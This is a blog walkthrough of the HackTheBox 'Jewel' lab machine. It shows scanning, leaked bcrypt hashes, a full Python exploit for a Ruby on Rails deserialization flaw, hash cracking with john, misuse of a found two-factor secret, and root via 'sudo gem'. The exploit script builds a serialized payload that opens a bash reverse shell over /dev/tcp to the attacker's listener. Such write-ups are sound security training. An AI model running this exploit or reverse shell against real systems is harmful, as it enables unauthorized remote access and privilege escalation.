Jewel HackTheBox WalkThrough

 Jewel Hackthebox walkthrough

This is Jewel HackTheBox machine walkthrough. In this write-up, I have demonstrated step-by-step how I rooted Jewel HTB machine. Before starting let us know something about this machine. It is a Linux machine with IP address 10.10.10.211 and difficulty Medium assigned by its maker.

First of all connect your PC with VPN and make sure your connectivity with Jewel machine by pinging its IP 10.10.10.211. If all goes correct then it is time to start hacking. As usual, I started by scanning the machine. Scanning give us an idea how we have to proceed further. Like, it helps in banner grabbing the services running over different ports and sometimes it helps in vulnerability scanning also. I have used nmap for this task and the result is given below:- 

Scanning

$ sudo nmap -sC -sV -oN jewel_scan.nmap 10.10.10.211

nmap report of the jewel machine

Nmap revealed that port 22, 8000 and 8080 are open. SSH on port 22, Apache2 on port 8000 and nginx webserver on port 8080 are running. Nmap script http-generator gave information that this website is using gitweb 2.20.1 interface. Since apache2 is running on port 8000 so there will be some website at URL http://10.10.10.211:8000 and since nginx is running on port 8080 therefore there will also be some website running at the URL http://10.10.10.211:8080.

I begin by enumerating on port 8000 because websites have more attack surfaces. Searched gitweb 2.20.1 for available exploits using searchsploit but found no exploits. Ongoing to URL https://10.10.10.211:8000 got redirected to http://10.10.10.211:8000/gitweb/ . After some enumeration found a file named bd.sql at URL http://10.10.10.211:8000/gitweb/?p=.git;a=blob;f=bd.sql;h=a7fddb693ca735f8aa1e4b09046cec2adddddc51;hb=HEAD. Hashes of user bill and jennifer are present in this file. Saved them to a file to crack using john and rockyou.txt. The extracted hashes are

$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW

$2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy

Hash found in the file bd.sql

Searched online the type of this hash is it and got information it is bcrypt hash.

Identifying Hash Type

Identifying hashes online in  Jewel Hackthebox machine

Then tried to crack them using john but couldn’t crack any of them. After further enumeration couldn’t not find any way to get into the jewel machine. Then moved ahead to enumerate on port 8080. As Phusion Passenger 6.0.6, service is listed by nmap so tried to search for available exploits for this using searchsploit but again found nothing. Ongoing to URL http://10.10.10.211:8080/login found a login page. Tried some basic SQL injection but not vulnerable. There is also a signup page so, registered an account by the creds

 Username : test1

 Email        [email protected]

 Password : test1

After logging with the creds [email protected] : test1, under profile menu tried to test for some injection attacks at username field (because it is the only field which we can manipulate) but could not get success. Till now I didn’t found any potential vector to get into the Jewel machine.

After getting some hint from the HTB forum and internet found that the webserver which is using ruby on rails version < 5.2.4.3 is vulnerable to deserialization attack. The current version of the ruby and ruby on rail can be found at the URL http://10.10.10.211:8000/gitweb/?p=.git;a=commitdiff;h=5d6f436256c9575fbc7b1fb9621b18f0f8656741

Version file of gem and ruby on jewel hackthebox machine

The working PoC can be found at GitHub. And more information about this vulnerability can be found at Google Forum.

You can follow the steps as given in the GitHub PoC. I tried to exploit this vulnerability using the above method and could easily exploit the vulnerability as given in above GitHub PoC. For simplicity @randomname83 has created a python script to get user shell. All you have to do is to copy the script code and paste it in a file named rev.py and run the script as shown in the screenshot after starting a netcat listener. The script code is 

import requests
import re
import sys

URL='http://{}:8080'.format(sys.argv[1])
username='myuser4'
password='mypass4'
email='[email protected]'

if len(sys.argv) != 4:
    print("specify target IP, your IP and port: python3 rev.py 10.10.xx.xx 9001")
    exit(0)

s = requests.Session()

resp = s.get(URL + '/signup')
rx = r'token" content="(.*)"'

token = re.search(rx,resp.text).group(1)

# create user
data = {}
data['utf8'] = 'â'
data['authenticity_token'] = token
data['user[username]'] = username
data['user[email]'] = email
data['user[password]'] = password
data['commit'] = 'Create User'
resp = s.post(URL + '/users', data=data)

# login
data = {}
data['utf8'] = 'â'
data['authenticity_token'] = token
data['session[email]'] = email
data['session[password]'] = password
data['commit'] = 'Log in'
resp = s.post(URL + '/login', data=data)

rx = r'href="/users/(.*)"'
user_id = re.search(rx,resp.text).group(1)

# rev shell
rev = "bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'".format(sys.argv[2], sys.argv[3])
payload = '\x04\x08o\x3A\x40ActiveSupport\x3A\x3ADeprecation\x3A\x3ADeprecatedInstanceVariableProxy'
payload += '\x09\x3A\x0E\x40instanceo\x3A\x08ERB\x08\x3A\x09\x40srcI\x22'
payload += '{}\x60{}\x60'.format(chr(len(rev)+7), rev)
payload += '\x06\x3A\x06ET\x3A\x0E\x40filenameI\x22\x061\x06\x3B\x09T\x3A\x0C\x40linenoi\x06\x3A\x0C\x40method\x3A'
payload += '\x0Bresult\x3A\x09\x40varI\x22\x0C\x40result\x06\x3B\x09T\x3A\x10\x40deprecatorIu\x3A\x1F'
payload += 'ActiveSupport\x3A\x3ADeprecation\x00\x06\x3B\x09T'

data = {}
data['utf8'] = 'â'
data['authenticity_token'] = token
data['_method'] = 'patch'
data['user[username]'] = payload
data['commit'] = 'Update User'
s.post(URL + '/users/' + user_id, data=data)
s.post(URL + '/users/' + user_id, data=data)

s.get(URL + '/articles')

Getting User Shell

$ python3 rev.py 10.10.10.211 10.10.14.19 1234

$ nc -nvlp 1234

$ id && whoami

Getting user shell during  Jewel Hackthebox walkthrough

We got a shell. Let us upgrade the shell to fully qualified Linux shell so that we can execute advanced Linux command.

Upgrading Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm

Upgrading the shell in  Jewel Hackthebox machine after getting user shell

We have upgraded our shell. Let us capture User Flag.

Capture User Flag

$ cat user.txt

User flag found during  Jewel Hackthebox walkthrough

Privilege Escalation

To escalate privilege to root we have to first find a privilege escalation vector. During initial enumeration ran command $sudo -l to check if any special privilege is given to user bill but it requires password. Then ran linpeas.sh. (a post exploitation enumeration script) to find privilege escalation vector. Linpeas found two password hashes inside the file dump_2020-08-27.sql and bd.sql present at the directory /var/backups/ and /home/bill/blog/ respectively. The hashes are

jennifer : $2a$12$sZac9R2VSQYjOcBTTUYy6.Zd5I02OnmkKnD3zA6MqMrzLKz0jeDO

Unknown : $2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW

On listing the content of file dump_2020-08-27.sql got another hash of user bill which is

bill: $2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW 

We have now a total of three hashes to crack. Among them one is for user jennifer which doesn’t exist and second’s user is not known. So we are left with one hash of bill.

Linpeas enumerated the hashes from the backup directory

Tried to crack it using john and could easily crack it.

Cracking Hash

$ vi creds.hash

$ sudo john --format=bcrypt creds.hash --wordlist=/usr/share/wordlists/rockyou.txt

$ sudo john creds.hash --show

Running john to crack hashes

John has successfully cracked the hash and the credential is bill : spongebob. Tried to ran the command $sudo -l  again to check any special privilege given to user bill, it asked a Verification Code after entering the password. It appears that there is some two factor authentication enabled for normal users to run $sudo -l command. After some more enumeration got a hidden file google_authenticator inside the home directory. There is secret code inside this file which is 2UQI3R52WFCLE6JTLDCSJYMJH4, this code can be used to generate OTP.  I have used authenticator addons for Firefox to generate OTP using this secret key. 

Google authenticator content in home directory of jewel htb machine

Installed authenticator by just clicking this Firefox URL.

Firefox authenticator addon

After installing the addons click on + > Manual Entry> Issuer: Anything & Secret : 2UQI3R52WFCLE6JTLDCSJYMJH4 > OK

Copy the OTP and type the command $sudo -l then password spongebob then enter OTP as Verification code.

$ sudo -l

~spongebob

~622463   

Running sudo -l command on  Jewel Hackthebox machine to see privilege to other user

So $sudo -l revealed that user bill can run all the command using gem binary. If you get such type of output like user can run (ALL : ALL)  /usr/bin/gem  then best place to get your exploit is GTFOBIN (Remember this). After going to this URL you can find the exploit to escalate privilege.

Gtfobin gem binary exploit
Img-Src:gtfobins.github.io

Finding PrivEsc Vector

So here our privilege escalation vector is Sudo Right Exploitation to get root. Let us get root shell and capture root flag.

Getting Root Shell

$ sudo gem open -e "/bin/sh -c /bin/sh" rdoc

# whoami && id

Privilege escalation in Jewel Hackthebox machine

Capture Root Flag 

#cat /root/root.txt

Root Flag captured during Jewel Hackthebox walkthrough

This was how I rooted to the Jewel HackTheBox machine. Learnt a lot during this challenge. Hope you guys have also learnt some new things. Thanks for reading this walkthrough. Share your experience in the comment section. Want to give any suggestion about the write-up feel free to write us at [email protected].

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am InfoSec Consultant in day and Bug Bounty Hunter & CTF player at night. Sometimes write walkthrough and other cyber security articles here. You can connect me at https://www.linkedin.com/in/deepakdkm/